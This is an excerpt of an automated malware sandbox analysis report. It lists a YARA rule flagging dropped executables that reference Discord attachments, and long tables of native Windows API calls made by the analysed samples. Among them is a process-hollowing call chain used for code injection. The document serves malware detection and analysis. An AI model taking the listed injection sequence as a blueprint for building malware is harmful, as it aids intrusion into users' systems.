Source: C:\Users\user\AppData\Local\Temp\DEDC.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\D8D0.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\FD36.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: String function: 6B59D08C appears 40 times
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: String function: 6B54B150 appears 128 times
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: String function: 6B5D5720 appears 76 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_0040185B Sleep,NtTerminateProcess, 3_2_0040185B
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_00401866 Sleep,NtTerminateProcess, 3_2_00401866
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_0040187A Sleep,NtTerminateProcess, 3_2_0040187A
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_0040163B NtMapViewOfSection, 3_2_0040163B
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_004018D3 NtTerminateProcess, 3_2_004018D3
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_00401884 Sleep,NtTerminateProcess, 3_2_00401884
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_00401888 NtTerminateProcess, 3_2_00401888
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_0040156A NtMapViewOfSection, 3_2_0040156A
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_2_004015DB
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_2_004017EA Sleep,NtTerminateProcess, 3_2_004017EA
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_1_0040156A NtMapViewOfSection, 3_1_0040156A
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 3_1_004015DB
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 3_1_0040163B NtMapViewOfSection, 3_1_0040163B
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 14_2_02BE0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 14_2_02BE0110
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_0040185B Sleep,NtTerminateProcess, 19_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_00401866 Sleep,NtTerminateProcess, 19_2_00401866
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_0040187A Sleep,NtTerminateProcess, 19_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_0040163B NtMapViewOfSection, 19_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_004018D3 NtTerminateProcess, 19_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_00401884 Sleep,NtTerminateProcess, 19_2_00401884
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_00401888 NtTerminateProcess, 19_2_00401888
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_0040156A NtMapViewOfSection, 19_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 19_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_2_004017EA Sleep,NtTerminateProcess, 19_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_1_0040156A NtMapViewOfSection, 19_1_0040156A
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_1_004015DB NtMapViewOfSection,NtMapViewOfSection, 19_1_004015DB
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 19_1_0040163B NtMapViewOfSection, 19_1_0040163B
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 23_2_02CB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 23_2_02CB0110
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_0040185B Sleep,NtTerminateProcess, 28_2_0040185B
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_00401866 Sleep,NtTerminateProcess, 28_2_00401866
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_0040187A Sleep,NtTerminateProcess, 28_2_0040187A
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_0040163B NtMapViewOfSection, 28_2_0040163B
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_004018D3 NtTerminateProcess, 28_2_004018D3
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_00401884 Sleep,NtTerminateProcess, 28_2_00401884
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_00401888 NtTerminateProcess, 28_2_00401888
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_0040156A NtMapViewOfSection, 28_2_0040156A
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_004015DB NtMapViewOfSection,NtMapViewOfSection, 28_2_004015DB
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 28_2_004017EA Sleep,NtTerminateProcess, 28_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_0040181C Sleep,NtTerminateProcess, 29_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402406 NtEnumerateKey, 29_2_00402406
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00401F25 NtQuerySystemInformation, 29_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00401828 Sleep,NtTerminateProcess, 29_2_00401828
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402431 NtEnumerateKey, 29_2_00402431
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_004017DA Sleep,NtTerminateProcess, 29_2_004017DA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_004017F8 NtTerminateProcess, 29_2_004017F8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_0040209A NtQuerySystemInformation, 29_2_0040209A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_004017A3 Sleep,NtTerminateProcess, 29_2_004017A3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5899A0 ZwCreateSection,LdrInitializeThunk, 29_2_6B5899A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589860 ZwQuerySystemInformation,LdrInitializeThunk, 29_2_6B589860
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589820 ZwEnumerateKey,LdrInitializeThunk, 29_2_6B589820
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5898C0 ZwDuplicateObject,LdrInitializeThunk, 29_2_6B5898C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589780 ZwMapViewOfSection,LdrInitializeThunk, 29_2_6B589780
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58967A NtQueryInformationProcess,LdrInitializeThunk, 29_2_6B58967A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589660 ZwAllocateVirtualMemory,LdrInitializeThunk, 29_2_6B589660
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589600 ZwOpenKey,LdrInitializeThunk, 29_2_6B589600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B573B48 ZwClose,ZwClose, 29_2_6B573B48
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AB70 ZwReleaseWorkerFactoryWorker, 29_2_6B58AB70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542B7E ZwSetInformationThread,ZwClose, 29_2_6B542B7E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B573B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 29_2_6B573B7A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 29_2_6B5D8372
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 29_2_6B5F6369
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AB60 ZwReleaseKeyedEvent, 29_2_6B58AB60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 29_2_6B5D6365
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618B58
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B575306 ZwReleaseKeyedEvent, 29_2_6B575306
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 29_2_6B544B00
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589B00 ZwSetValueKey, 29_2_6B589B00
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549335 ZwClose,ZwClose, 29_2_6B549335
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B60131B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 29_2_6B542BC2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5423F6 ZwClose,RtlFreeHeap, 29_2_6B5423F6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589BF0 ZwAlertThreadByThreadId, 29_2_6B589BF0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 29_2_6B55A3E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 29_2_6B542B93
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B601BA8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 29_2_6B57939F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618BB6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B619BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B619BBE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B60138A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A3A0 ZwGetCompleteWnfStateSubscription, 29_2_6B58A3A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 29_2_6B574BAD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618A62
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589A50 ZwCreateFile, 29_2_6B589A50
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 29_2_6B5D1242
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589A00 ZwProtectVirtualMemory, 29_2_6B589A00
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 29_2_6B57B230
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589A30 ZwTerminateThread, 29_2_6B589A30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B548239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 29_2_6B548239
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 29_2_6B544A20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 29_2_6B618214
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D4A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 29_2_6B5D4A28
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 29_2_6B56FAD0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1AD6 ZwFreeVirtualMemory, 29_2_6B5D1AD6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AAC0 ZwQueryWnfStateNameInformation, 29_2_6B58AAC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589AE0 ZwTraceEvent, 29_2_6B589AE0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AAE0 ZwRaiseException, 29_2_6B58AAE0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618ADD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 29_2_6B57D294
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58AA90 ZwQuerySystemInformationEx, 29_2_6B58AA90
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 29_2_6B54429E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B562280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 29_2_6B562280
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B280 ZwWow64DebuggerCall, 29_2_6B58B280
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 29_2_6B57DA88
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589AB0 ZwWaitForMultipleObjects, 29_2_6B589AB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57E2BB ZwWaitForAlertByThreadId, 29_2_6B57E2BB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B541AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 29_2_6B541AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B575AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 29_2_6B575AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 29_2_6B54F150
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B618966
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B150 ZwUnsubscribeWnfStateChange, 29_2_6B58B150
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 29_2_6B54395E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 29_2_6B56B944
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D976 ZwCreateFile,ZwCreateFile, 29_2_6B57D976
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 29_2_6B54B171
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1976 ZwCreateEvent, 29_2_6B5D1976
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B160 ZwUpdateWnfStateData, 29_2_6B58B160
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A160 ZwCreateWorkerFactory, 29_2_6B58A160
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B550100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589900 ZwOpenEvent, 29_2_6B589900
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F13B ZwOpenKey,ZwCreateKey, 29_2_6B61F13B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5E5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 29_2_6B5E5100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D193B ZwRaiseException,ZwTerminateProcess, 29_2_6B5D193B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A130 ZwCreateWaitCompletionPacket, 29_2_6B58A130
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589920 ZwDuplicateToken, 29_2_6B589920
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6189E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6B6189E7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 29_2_6B5D19C8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6049A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589990 ZwQueryVolumeInformationFile, 29_2_6B589990
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6B54519E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 29_2_6B56C182
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 29_2_6B61F1B5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B180 ZwWaitForAlertByThreadId, 29_2_6B58B180
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589980 ZwCreateEvent, 29_2_6B589980
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 29_2_6B5F6186
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C51BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A9B0 ZwQueryLicenseValue, 29_2_6B58A9B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 29_2_6B57C9BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 29_2_6B60A189
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58B1A0 ZwWaitForKeyedEvent, 29_2_6B58B1A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589850 ZwQueryDirectoryFile, 29_2_6B589850
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589840 ZwDelayExecution, 29_2_6B589840
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 29_2_6B5D1879
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618858 ZwAlertThreadByThreadId, 29_2_6B618858
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55106F ZwOpenKey,ZwClose, 29_2_6B55106F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 29_2_6B54F018
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B589830 ZwOpenFile, 29_2_6B589830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 29_2_6B574020
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 29_2_6B61F019
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5898D0 ZwQueryAttributesFile, 29_2_6B5898D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58A0D0 ZwCreateTimer2, 29_2_6B58A0D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5810D7 ZwOpenKey,ZwCreateKey, 29_2_6B5810D7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5470C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 29_2_6B5470C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5800C2 ZwAlertThreadByThreadId, 29_2_6B5800C2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 29_2_6B54B8F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5440FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 29_2_6B5440FD
